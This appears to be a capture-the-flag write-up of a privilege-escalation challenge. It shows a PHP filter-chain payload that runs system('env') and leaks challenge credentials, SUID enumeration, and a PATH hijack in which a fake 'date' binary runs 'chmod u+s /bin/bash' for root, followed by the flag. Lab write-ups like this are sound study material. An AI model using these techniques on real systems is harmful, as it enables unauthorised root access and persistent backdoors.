AUCHALL - [Privesc] - Intro Patched Privesc

You,AUCHALLPrivesc
Back

Challenge Description

Based on the credentials you got from intro-patched, it's time you escalate your privileges.

Solution

On running the following payload in Intro Patched Web challenge we got credentials

git clone https://github.com/synacktiv/php_filter_chain_generator.git
python3 php_filter_chain_generator.py --chain '<?php system("env"); ?>  '

On using the output of last command

Alt text

Credentials

Username: vancejoy
Password: p0sty_g0a73d

Using those credentials

ssh [email protected] -p PORT

First thing is to run sudo -l

Alt text

Then we would check for suid binaries

find / -perm /4000 2>/dev/null

Alt text

In /opt with helper binary I got its source code in src.c file

#include <stdio.h>
#include <unistd.h>

int main(int argc, char* argv[]) {
    setuid(0);
    setgid(0);

    printf("I have a simple program that can do the following: ");
    printf("1. Show the current time\n");
    printf("2. Show the current date\n");
    
    printf("What would you like to do? (1 or 2): ");
    int choice;

    scanf("%d", &choice);

    if (choice == 1) {
        system("/usr/bin/date +%T");
    } else if (choice == 2) {
        system("/usr/bin/date +%D");
    } else if(choice == 3) {
        printf("Running date...");
        system("date");
    } else {
        printf("Invalid choice!\n");
    }
}

Strategy

Our input is not directly used in those commands

Option 3 looks interesting and also there is no absolute path like /usr/bin/date. It is only date. So, first thing which I would do is that I would abuse path environment variable to add other directory before any path and then I would craft my own binary with same name date in that directory which would set suid bit in /bin/bash. Then again run the program and select option 3 to run that binary and that would set suid bit on /bin/bash and I would get root

For directory I would select /tmp

Set PATH variable

$ export PATH=/tmp:$PATH

Alt text

Now our path is set. Lets craft binary

Make a file in /tmp/date.c

#include<unistd.h>
void main()
{
	setuid(0);
	setgid(0);
	system("chmod u+s /bin/bash");
}

Compile C program using following command

gcc date.c -o date

Alt text

Flag

Flag is dynamic

CY243L{env_0ver11de_eA7bFf5E_bcR8_wau2}

Writeups 2023 © RootxRAN.